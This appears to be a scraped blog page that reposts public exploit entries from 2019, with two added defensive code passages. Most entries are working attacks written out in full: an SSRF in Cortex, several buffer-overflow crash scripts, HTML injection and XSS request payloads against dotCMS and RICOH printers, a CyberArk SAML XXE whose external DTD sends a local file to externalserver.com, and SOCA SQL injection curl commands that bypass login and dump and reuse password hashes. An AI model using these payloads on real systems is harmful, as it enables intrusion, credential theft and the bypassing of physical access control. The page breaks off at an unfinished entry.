All posts by ISHACK AI BOT

  1. # Exploit Title: Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery
     # Date: 2/26/2019
     # Exploit Author: Alexandre Basquin
     # Vendor Homepage: https://blog.thehive-project.org
     # Software Link: https://github.com/TheHive-Project/Cortex
     # Version: Cortex <= 2.1.3
     # Tested on: 2.1.3
     # CVE : CVE-2019-7652

     # Exploit description
     The "UnshortenLink_1_0" analyzer used by Cortex contains an SSRF vulnerability.

     POC:
     1. Create a new analysis
     2. Select Data Type "URL"
     3. Put your SSRF payload in the Data parameter (e.g. "http://127.0.0.1:22")
     4. Result can be seen in the main dashboard.

     Reported to TheHive Project by Alexandre Basquin on 1/24/2019
     The issue has been fixed in UnshortenLink 1.1 released within Cortex-analyzers 1.15.2

     References:
     https://blog.thehive-project.org/2019/02/11/unshortenlink-ssrf-and-cortex-analyzers-1-15-2/
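The SSRF in the post above comes down to the analyzer fetching whatever URL it is handed, including loopback and internal addresses. The following destination check is an added example, not code from the Cortex project or from the post: it classifies the target address (literal IP or resolved hostname) and refuses anything that is not globally routable, and restricts scheme and port. The hostnames and the in-memory `SAMPLE_DNS` table are constructed so the example runs offline, and the web-ports-only policy is an assumption for the example.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed, in-memory stand-in for DNS so the example runs offline.
# A real deployment would call socket.getaddrinfo() here and check every
# address it returns (the hostnames are hypothetical, chosen for the example).
SAMPLE_DNS = {
    "bit.ly": ["67.199.248.10"],               # public shortener
    "intranet.local": ["10.0.0.5"],            # RFC 1918 host
    "metadata.internal": ["169.254.169.254"],  # link-local metadata service
}

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}   # example policy: web ports only, so http://127.0.0.1:22 cannot pass


def is_public_address(ip):
    """True only for globally routable unicast addresses (IPv4 or IPv6)."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_unshorten_target(url, resolve=lambda host: SAMPLE_DNS.get(host, [])):
    """Return (allowed, reason). Fails closed on anything it cannot classify."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    try:
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError:
        return False, "malformed port"
    if port is not None and port not in ALLOWED_PORTS:
        return False, "port %d not allowed" % port
    # Literal IP addresses are checked directly; hostnames go through the resolver.
    try:
        ipaddress.ip_address(host)
        addresses = [host]
    except ValueError:
        addresses = resolve(host)
    if not addresses:
        return False, "host %r did not resolve" % host
    for ip in addresses:
        if not is_public_address(ip):
            return False, "host %r resolves to non-public address %s" % (host, ip)
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("http://bit.ly/abc", "http://127.0.0.1:22",
                      "http://metadata.internal/latest/meta-data/", "file:///etc/passwd"):
        print(candidate, check_unshorten_target(candidate))
```

Two points matter in practice: the address that passed the check must be the one the HTTP client actually connects to (resolve once and connect to that IP, otherwise a second lookup can be rebound to an internal address), and the same check has to be re-applied to every hop of a redirect chain, since an unshortener follows redirects by design.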
  2. # -*- coding: utf-8 -*-
     # Exploit Title: Lyric Maker 2.0.1.0 - Denial of Service (PoC)
     # Date: 08/05/2019
     # Author: Alejandra Sánchez
     # Vendor Homepage: http://www.jetaudio.com/
     # Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
     # Version: 2.0.1.0
     # Tested on: Windows 10

     # Proof of Concept:
     # 1.- Run the python script "LyricMaker.py", it will create a new file "LyricMaker.txt"
     # 2.- Copy the text from the generated LyricMaker.txt file to clipboard
     # 3.- Open JetLyric.exe or Lyric Maker
     # 4.- Paste clipboard in the field "Title"
     # 5.- Go to file -> Save Lyric...
     # 6.- Save the file with any name, e.g 'sample.jlr'
     # 7.- Crashed

     buffer = "\x41" * 5000
     f = open("LyricMaker.txt", "w")
     f.write(buffer)
     f.close()
  3. # -*- coding: utf-8 -*-
     # Exploit Title: Convert Video jetAudio 8.1.7 - Denial of Service (PoC)
     # Date: 08/05/2019
     # Author: Alejandra Sánchez
     # Vendor Homepage: http://www.jetaudio.com/
     # Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
     # Version: 8.1.7
     # Tested on: Windows 10

     # Proof of Concept:
     # 1.- Run the python script "ConvertVideo.py", it will create a new file "ConvertVideo.txt"
     # 2.- Copy the text from the generated ConvertVideo.txt file to clipboard
     # 3.- Open JetVidCnv.exe or Video Converter
     # 4.- Click on the 'Add Files...' button and select a video file
     # 5.- Paste clipboard in the field "File Naming"
     # 6.- Click on the 'Preview' button
     # 7.- Crashed

     buffer = "\x41" * 512
     f = open("ConvertVideo.txt", "w")
     f.write(buffer)
     f.close()
  4. #Exploit Title: jetCast Server 2.0 - Denial of Service (PoC)
     #Discovery by: Victor Mondragón
     #Discovery Date: 2019-05-09
     #Vendor Homepage: http://www.jetaudio.com/
     #Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe
     #Tested Version: 2.0
     #Tested on: Windows 7 Service Pack 1 x64

     #Steps to produce the crash:
     #1.- Run python code: jetCast_Server_2.0.py
     #2.- Open jetCast.txt and copy content to clipboard
     #3.- Open jetCast Server
     #4.- Select Config
     #5.- In "Log directory" Paste ClipBoard
     #6.- Click on "Ok"
     #7.- Click on "Start"
     #8.- Crashed

     cod = "\x41" * 5000
     f = open('jetCast.txt', 'w')
     f.write(cod)
     f.close()
  5. # -*- coding: utf-8 -*-
     # Exploit Title: SpotIM 2.2 - 'Name/Key' Denial of Service (PoC)
     # Date: 09/05/2019
     # Author: Alejandra Sánchez
     # Vendor Homepage: http://www.nsauditor.com
     # Software Link http://www.nsauditor.com/downloads/spotim_setup.exe
     # Version: 2.2
     # Tested on: Windows 10

     # Proof of Concept:
     # 1.- Run the python script "SpotIM.py", it will create a new file "SpotIM.txt"
     # 2.- Copy the text from the generated SpotIM.txt file to clipboard
     # 3.- Open SpotIM
     # 4.- Select "Register" > "Enter Registration Code..."
     # 5.- Paste clipboard in the Name/Key field
     # 6.- Click 'OK'
     # 7.- Crashed

     buffer = "\x41" * 1000
     f = open("SpotIM.txt", "w")
     f.write(buffer)
     f.close()
  6. # -*- coding: utf-8 -*-
     # Exploit Title: SpotPaltalk 1.1.5 - 'Name/Key' Denial of Service (PoC)
     # Date: 09/05/2019
     # Author: Alejandra Sánchez
     # Vendor Homepage: http://www.nsauditor.com
     # Software Link http://www.nsauditor.com/downloads/spotpaltalk_setup.exe
     # Version: 1.1.5
     # Tested on: Windows 10

     # Proof of Concept:
     # 1.- Run the python script "SpotPaltalk.py", it will create a new file "SpotPaltalk.txt"
     # 2.- Copy the text from the generated SpotPaltalk.txt file to clipboard
     # 3.- Open SpotPalTalk
     # 4.- Select "Register" > "Enter Registration Code..."
     # 5.- Paste clipboard in the Name/Key field
     # 6.- Click 'OK'
     # 7.- Crashed

     buffer = "\x41" * 1000
     f = open("SpotPaltalk.txt", "w")
     f.write(buffer)
     f.close()
  7. #Exploit Title: ASPRunner.NET 10.1 - Denial of Service (PoC)
     #Discovery by: Victor Mondragón
     #Discovery Date: 2019-05-09
     #Vendor Homepage: https://xlinesoft.com/
     #Software Link: https://xlinesoft.com/asprunnernet/download.htm
     #Tested Version: 10.1
     #Tested on: Windows 7 Service Pack 1 x64

     #Steps to produce the crash:
     #1.- Run python code: ASPRunner_net_10_1.py
     #2.- Open ASPRunner_10_1.txt and copy content to clipboard
     #3.- Open ASPRunner.NET
     #4.- Click on "Next" > Select "SQLite" database > click on "Next"
     #5.- Click on "Create new database"
     #6.- In "Table name" field Paste Clipboard
     #7.- Click on "Create table"
     #8.- Crashed

     cod = "\x41" * 10000
     f = open('ASPRunner_10_1.txt', 'w')
     f.write(cod)
     f.close()
  8. # Exploit Title: dotCMS 5.1.1 - HTML Injection
     # Date: 2019-05-09
     # Exploit Author: Ismail Tasdelen
     # Vendor Homepage: https://dotcms.com/
     # Software Link: https://github.com/dotCMS
     # Software: dotCMS
     # Product Version: 5.1.1
     # Vulnerability Type: Code Injection
     # Vulnerability: HTML Injection and Cross-site Scripting
     # CVE: CVE-2019-11846

     # HTTP POST Request :

     POST /servlets/ajax_file_upload?fieldName=binary3 HTTP/1.1
     Host: TARGET
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: https://TARGET/c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=site-browser&p_p_action=1&p_p_state=maximized&angularCurrentPortlet=site-browser&p_p_mode=view&_site_browser_struts_action=%2Fext%2Fcontentlet%2Fedit_contentlet&_site_browser_cmd=new&selectedStructure=33888b6f-7a8e-4069-b1b6-5c1aa9d0a48d&folder=SYSTEM_FOLDER&referer=/c/portal/layout%3Fp_l_id%3Db7ab5d3c-5ee0-4195-a17e-8f5579d718dd%26p_p_id%3Dsite-browser%26p_p_action%3D0%26p_p_state%3Dmaximized%26angularCurrentPortlet%3Dsite-browser%26p_p_mode%3Dview%26_site_browser_struts_action%3D%252Fext%252Fbrowser%252Fview_browser&in_frame=true&frame=detailFrame&container=true&angularCurrentPortlet=site-browser
     Content-Type: multipart/form-data; boundary=---------------------------5890268631313811380287956669
     Content-Length: 101313
     DNT: 1
     Connection: close
     Cookie: messagesUtk=2366e7c3b5af4c8c93bb11d0c994848a; BACKENDID=172.18.0.3; JSESSIONID=65C16EFBEE5B7176B22083A0CA451F0A.c16f6b7d05d9; hs-messages-hide-welcome-message=true; access_token=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJkZGFlZmEzNS0yYmMyLTQ4MTEtOTRjNi0xNGE0OTk4YzFkNDAiLCJpYXQiOjE1NTczOTY0NzYsInVwZGF0ZWRfYXQiOjEyMDQ4MjQ5NjEwMDAsInN1YiI6ImRvdGNtcy5vcmcuMSIsImlzcyI6IjRiNTkyYjIyLTBiMmEtNGI2ZC05NmU4LTdjMzBiMzgzOTM1ZiJ9.F8_L_Cu96pkYcwTl4ex_zfrA-Fk-rqNUz24oCV0gOmc; DWRSESSIONID=EZToDkzmi*mMXCayMxskFA75sGm
     Upgrade-Insecure-Requests: 1

     -----------------------------5890268631313811380287956669
     Content-Disposition: form-data; name="binary3FileUpload"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")> .json"
     Content-Type: application/json

     # HTTP Response :

     HTTP/1.1 200
     Content-Length: 0
     Date: Thu, 09 May 2019 10:23:44 GMT
     Connection: close
  9. #Exploit Title: PHPRunner 10.1 - Denial of Service (PoC)
     #Discovery by: Victor Mondragón
     #Discovery Date: 2019-05-09
     #Vendor Homepage: https://xlinesoft.com/
     #Software Link: https://xlinesoft.com/phprunner/download.htm
     #Tested Version: 10.1
     #Tested on: Windows 7 Service Pack 1 x64

     #Steps to produce the crash:
     #1.- Run python code: PHPRunner_10_1.py
     #2.- Open PHPRunner_10_1.txt and copy content to clipboard
     #3.- Open PHPRunner
     #4.- Click on "Next" > Select "Microsoft Access" database > click on "Next"
     #5.- Click on "Create new database" > click on "Create table"
     #6.- Select "Create dashboard" > in "Name" field Paste Clipboard
     #7.- Click on "Ok"
     #8.- Crashed

     cod = "\x41" * 10000
     f = open('PHPRunner_10_1.txt', 'w')
     f.write(cod)
     f.close()
  10. # Exploit Title: RICOH SP 4510DN Printer - HTML Injection
     # Date: 2019-05-06
     # Exploit Author: Ismail Tasdelen
     # Vendor Homepage: https://www.ricoh.com/
     # Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html
     # Software: RICOH Printer
     # Product Version: SP 4510DN
     # Vulnerability Type: Code Injection
     # Vulnerability: HTML Injection
     # CVE: CVE-2019-11845

     # An HTML Injection vulnerability has been discovered on the RICOH SP 4510DN via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter.

     # HTTP POST Request :

     POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
     Host: TARGET
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
     Accept: text/plain, */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: http://TARGET/web/entry/en/address/adrsList.cgi
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     X-Requested-With: XMLHttpRequest
     Content-Length: 102
     DNT: 1
     Connection: close
     Cookie: risessionid=071652497206133; cookieOnOffChecker=on; wimsesid=98044857

     mode=ADDUSER&step=BASE&wimToken=958429369&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E

     # HTTP Response :

     HTTP/1.1 200 OK
     Date: Mon, 06 May 2019 11:42:46 GMT
     Server: Web-Server/3.0
     Content-Type: text/plain
     Expires: Mon, 06 May 2019 11:42:46 GMT
     Set-Cookie: cookieOnOffChecker=on; path=/
     Connection: close
  11. # Exploit Title: RICOH SP 4520DN Printer - HTML Injection
     # Date: 2019-05-06
     # Exploit Author: Ismail Tasdelen
     # Vendor Homepage: https://www.ricoh.com/
     # Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html
     # Software: RICOH Printer
     # Product Version: SP 4520DN
     # Vulnerability Type: Code Injection
     # Vulnerability: HTML Injection
     # CVE: CVE-2019-11844

     # An HTML Injection vulnerability has been discovered on the RICOH SP 4520DN via the /web/entry/en/address/adrsSetUserWizard.cgi
     # entryNameIn or entryDisplayNameIn parameter.

     # HTTP POST Request :

     POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
     Host: TARGET
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
     Accept: text/plain, */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: http://TARGET/web/entry/en/address/adrsList.cgi
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     X-Requested-With: XMLHttpRequest
     Content-Length: 219
     DNT: 1
     Connection: close
     Cookie: risessionid=110508462500758; cookieOnOffChecker=on; wimsesid=598742008

     mode=ADDUSER&step=BASE&wimToken=279565363&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryDisplayNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1

     # HTTP Response :

     HTTP/1.1 200 OK
     Date: Mon, 06 May 2019 11:00:09 GMT
     Server: Web-Server/3.0
     Content-Type: text/plain
     Expires: Mon, 06 May 2019 11:00:09 GMT
     Set-Cookie: cookieOnOffChecker=on; path=/
     Connection: close
  12. # Exploit Title: CyberArk XML External Entity (XXE) Injection in SAML authentication
     # Date: 10/05/2019
     # Exploit Author: Marcelo Toran (@spamv)
     # Vendor Homepage: https://www.cyberark.com
     # Version: <=10.7
     # CVE : CVE-2019-7442

     -----------Product description

     The CyberArk Enterprise Password Vault is a privileged access security solution to store, monitor and rotate credentials. The main objective of the solution is protecting the privileged accounts that are used to administrate the systems of the organisations.

     -----------Vulnerability description

     This vulnerability allows remote attackers to disclose sensitive information or potentially bypass the authentication system.

     -----------Vulnerability Details

     # Exploit Title: XML External Entity (XXE) Injection in SAML authentication
     # Affected Component: Password Vault Web Access (PVWA)
     # Affected Version: <=10.7
     # Vendor: CyberArk
     # Vendor Homepage: https://www.cyberark.com
     # Date: 18/12/2018
     # CVSS Base Score: 7.5 (High)
     # CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     # Exploit Author: Marcelo Torán (Nixu Corporation)
     # CVE: CVE-2019-7442
     # CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7442

     -----------Technical Description

     It has been found that the XML parser of the SAML authentication system of the Password Vault Web Access (PVWA) is vulnerable to XML External Entity (XXE) attacks via a crafted DTD. No user interaction or privileges are required as the vulnerability is triggered in pre-authentication.

     The vulnerable component is: https://example.com/PasswordVault/auth/saml
     The vulnerable argument: SAMLResponse

     -----------POC

     # pepe.dtd is an external entity stored in a remote web server where we define the file that will be read and the server that will be used for the exfiltration:

     <!ENTITY % data SYSTEM "file:///C:/Windows/win.ini">
     <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://externalserver.com/?%data;'>">

     # The malicious XML payload where is defined the address of the external entity defined in the previous step:

     <!DOCTYPE r [
     <!ELEMENT r ANY >
     <!ENTITY % sp SYSTEM "http://externalserver.com/pepe.dtd">
     %sp;
     %param1;
     ]>
     <r>&exfil;</r>

     # XML payload base64 encoded + equal symbols URL encoded:

     PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d

     # CURL command to exploit the XXE:

     curl -i -s -k -X $'POST' \
       -H $'Host: example.com' -H $'User-Agent: PoC CyberArk XXE Injection :(' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 177' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
       --data-binary $'SAMLResponse=PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d' \
       $'https://example.com/PasswordVault/auth/saml/'

     # Checking the logs of the external server:

     example.com - - [XX/XX/XX XX:XX:XX] "GET /pepe.dtd HTTP/1.1" 200 -
     example.com - - [XX/XX/XX XX:XX:XX] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5Bfiles%5D%0D%0A%5BMail%5D%0D%0AMAPI=1 HTTP/1.1" 200 -

     # And decoding the content of the logs it's possible to read the requested file of the machine:

     ; for 16-bit app support
     [fonts]
     [extensions]
     [mci extensions]
     [files]
     [Mail]
     MAPI=1

     -----------Timeline

     18/12/2018 – Vulnerability discovered
     10/01/2019 – Vendor notified
     23/01/2019 – Vulnerability accepted
     05/02/2019 – CVE number requested
     05/02/2019 – CVE number assigned
     19/02/2019 – Vendor released a patch
     19/02/2019 – Advisory released

     -----------Proof of Concept (PoC)

     https://www.octority.com/2019/05/07/cyberark-enterprise-password-vault-xml-external-entity-xxe-injection/
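The XXE in the post above needs one thing from the SAML endpoint: an XML parser that honours a DOCTYPE with external (parameter) entities. A SAML 2.0 Response never legitimately carries a DTD, so a service-provider side can refuse the whole class before parsing. The following is an added example, not CyberArk's code or anything from the post: it decodes the base64 `SAMLResponse` form field, rejects any `<!DOCTYPE` or `<!ENTITY` declaration, and only then hands the bytes to the parser. The two fixtures are constructed (a minimal benign Response, and a document with the same DOCTYPE/parameter-entity shape as the PoC); it is assumed the web framework has already URL-decoded the field.

```python
import base64
import re
from xml.etree import ElementTree as ET

# Any DTD construct is rejected before the document reaches the XML parser.
# SAML messages never legitimately carry a DOCTYPE, so this is a fail-closed
# rule (it also rejects a DOCTYPE hidden inside a comment, which is acceptable).
DTD_RE = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


class UnsafeSamlResponse(ValueError):
    """Raised when the SAMLResponse carries a DTD, the precondition for XXE."""


def find_dtd(raw):
    """Return the first DTD keyword found in the decoded document, or None."""
    match = DTD_RE.search(raw)
    return match.group(0).decode("ascii") if match else None


def parse_saml_response(form_value):
    """Decode the base64 SAMLResponse field and parse it, refusing any DTD.

    The field is assumed to be URL-decoded already (the post's payload ends
    in %3d, which is the '=' base64 padding after URL encoding).
    """
    raw = base64.b64decode(form_value, validate=True)
    offending = find_dtd(raw)
    if offending is not None:
        raise UnsafeSamlResponse("%s declaration not allowed in SAMLResponse" % offending)
    return ET.fromstring(raw)


def is_safe_saml_response(form_value):
    """Predicate form: True when the field decodes and parses without a DTD."""
    try:
        parse_saml_response(form_value)
        return True
    except (UnsafeSamlResponse, ET.ParseError, ValueError):
        return False


# Constructed fixtures (not real IdP traffic): a minimal benign Response and a
# document with the same DOCTYPE/parameter-entity shape as the post's PoC.
BENIGN_XML = (b'<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
              b'xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_c1" Version="2.0">'
              b'<saml:Issuer>https://idp.example.test</saml:Issuer></samlp:Response>')
XXE_XML = (b'<!DOCTYPE r [<!ELEMENT r ANY><!ENTITY % sp SYSTEM '
           b'"http://externalserver.com/pepe.dtd">%sp;%param1;]><r>&exfil;</r>')
BENIGN_SAMLRESPONSE = base64.b64encode(BENIGN_XML).decode("ascii")
XXE_SAMLRESPONSE = base64.b64encode(XXE_XML).decode("ascii")

if __name__ == "__main__":
    print("benign accepted:", is_safe_saml_response(BENIGN_SAMLRESPONSE))
    print("xxe accepted:   ", is_safe_saml_response(XXE_SAMLRESPONSE))
```

The pre-check is defence in depth, not a substitute for parser configuration: the parser itself should have DTD processing and external entity resolution disabled (in Python, `defusedxml` does this; in .NET, a `XmlReaderSettings` with `DtdProcessing` set to prohibit), so that a document reaching the parser by another path is still safe. Both controls are independent of the signature check, which in the XXE case never gets to run because the entity is expanded while the XML is being read.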
  13. #Exploit Title: SpotMSN 2.4.6 - 'Name/Key' Denial of Service (PoC)
     #Discovery by: Victor Mondragón
     #Discovery Date: 2019-05-12
     #Vendor Homepage: www.nsauditor.com
     #Software Link: http://www.nsauditor.com/downloads/spotmsn_setup.exe
     #Tested Version: 2.4.6
     #Tested on: Windows 10 Single Language x64 / 7 x64 Service Pack 1

     #Steps to produce the crash:
     #1.- Run python code: SpotMSN_2.4.6.py
     #2.- Open SpotMSN.txt and copy content to clipboard
     #3.- Open SpotMSN
     #4.- Select "Register" > "Enter Registration Code..."
     #5.- In "Name/Key" paste Clipboard
     #6.- Click "Ok"
     #7.- Crashed

     cod = "\x41" * 300
     f = open('SpotMSN.txt', 'w')
     f.write(cod)
     f.close()
  14. SOCA Access Control System 180612 SQL Injection And Authentication Bypass

     Vendor: SOCA Technology Co., Ltd
     Product web page: http://www.socatech.com
     Affected version: 180612, 170000 and 141007

     Summary: The company's products include proximity and fingerprint access control system, time and attendance, electric locks, card reader and writer, keyless entry system and other 30 specialized products. All products are attractively designed with advanced technology in accordance with users' safety and convenience which also fitted international standard.

     Desc: The Soca web access control system suffers from multiple SQL Injection vulnerabilities. Input passed via multiple POST parameters is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. It allows the attacker to remotely disclose password hashes and login with MD5 hash with highest privileges resulting in unlocking doors and bypass the physical access control in place.

     Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
                Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
                Apache/2.2.22 (Win32)
                PHP/5.4.13
                Firebird/InterBase DBMS

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience

     Advisory ID: ZSL-2019-5519
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5519.php

     20.04.2018

     --

     Authentication bypass / SQL injection via pos_id POST parameter in Login.php:
     -----------------------------------------------------------------------------
     -version 141007

     # curl -X POST --data "pos_id=' or 1=1--&pos_pw=whatever&Lang=eng" -i \
       "http://10.0.0.4/Login/Login.php"

     HTTP/1.1 200 OK
     Date: Fri, 03 May 2018 13:37:25 GMT
     Server: Apache/2.2.22 (Win32) PHP/5.4.13
     X-Powered-By: PHP/5.4.13
     Set-Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6; path=/
     Expires: Thu, 19 Nov 1981 08:52:00 GMT
     Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
     Pragma: no-cache
     Content-Length: 5
     Content-Type: text/html

     true

     Authentication bypass / SQL injection via ID POST parameter in Login.php:
     =========================================================================
     -version 180612

     # curl -X POST --data "ID=' or 1=1--&PW=whatever&Lang=eng" \
       "http://10.0.0.3/Login/Login.php"

     {"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"' or 1=1--","sess_passwd":"008c5926ca861023c1d2a36653fd88e2","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}}

     Authenticated SQL injection via cidx POST parameter in Card_Edit_GetJson.php:
     =============================================================================

     Dump current user:
     ------------------

     # curl -X POST --data "cidx=144 and 1=(user)" \
       "http://10.0.0.3/Card/Card_Edit_GetJson.php" \
       -H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"

     Warning: ibase_fetch_assoc(): conversion error from string "SYSDBA"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17

     Dump table:
     -----------

     # curl -X POST --data "cidx=144 and 1=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields)" \
       "http://10.0.0.3/Card/Card_Edit_GetJson.php" \
       -H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"

     Warning: ibase_fetch_assoc(): conversion error from string "USERS"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17

     Dump column:
     ------------

     # curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields))" \
       "http://10.0.0.3/Card/Card_Edit_GetJson.php" \
       -H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"

     Warning: ibase_fetch_assoc(): conversion error from string "U_NAME"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17

     Dump column:
     ------------

     # curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+56+distinct+rdb$relation_name+from+rdb$relation_fields))" \
       "http://10.0.0.3/Card/Card_Edit_GetJson.php" \
       -H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"

     Warning: ibase_fetch_assoc(): conversion error from string "U_PASSWORD"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17

     Dump username and Idx from USERS table:
     ---------------------------------------

     # curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_NAME || U_IDX+from+USERS)" \
       "http://10.0.0.3/Card/Card_Edit_GetJson.php" \
       -H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"

     Warning: ibase_fetch_assoc(): conversion error from string "USER1"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17

     Dump passwords from UAC table:
     ------------------------------

     # curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_PASSWORD+from+UAC)" \
       "http://10.0.0.3/Card/Card_Edit_GetJson.php" \
       -H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"

     Warning: ibase_fetch_assoc(): conversion error from string "4a7d1ed414474e4033ac29ccb8653d9b"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17

     Login with MD5:
     ===============

     # curl -X POST --data "ID=USER&PW=4a7d1ed414474e4033ac29ccb8653d9b&Lang=eng" \
       "http://10.0.0.3/Login/Login.php"

     {"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"USER","sess_passwd":"4a7d1ed414474e4033ac29ccb8653d9b","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}}
  15. #Exploit Title: DNSS Domain Name Search Software 2.1.8 - Denial of Service (PoC)
     #Discovery by: Victor Mondragón
     #Discovery Date: 2019-05-12
     #Vendor Homepage: www.nsauditor.com
     #Software Link: http://www.nsauditor.com/downloads/dnss_setup.exe
     #Tested Version: 2.1.8
     #Tested on: Windows 10 Single Language x64 / 7 x64 Service Pack 1

     #Steps to produce the crash:
     #1.- Run python code: DNSS_2.1.8.py
     #2.- Open DNSS.txt and copy content to clipboard
     #3.- Open Dnss
     #4.- Select "Register" > "Enter Registration Code..."
     #5.- In "Name/Key" paste Clipboard
     #6.- Click "Ok"
     #7.- Crashed

     cod = "\x41" * 300
     f = open('DNSS.txt', 'w')
     f.write(cod)
     f.close()
  16. SOCA Access Control System 180612 Information Disclosure

     Vendor: SOCA Technology Co., Ltd
     Product web page: http://www.socatech.com
     Affected version: 180612, 170000 and 141007

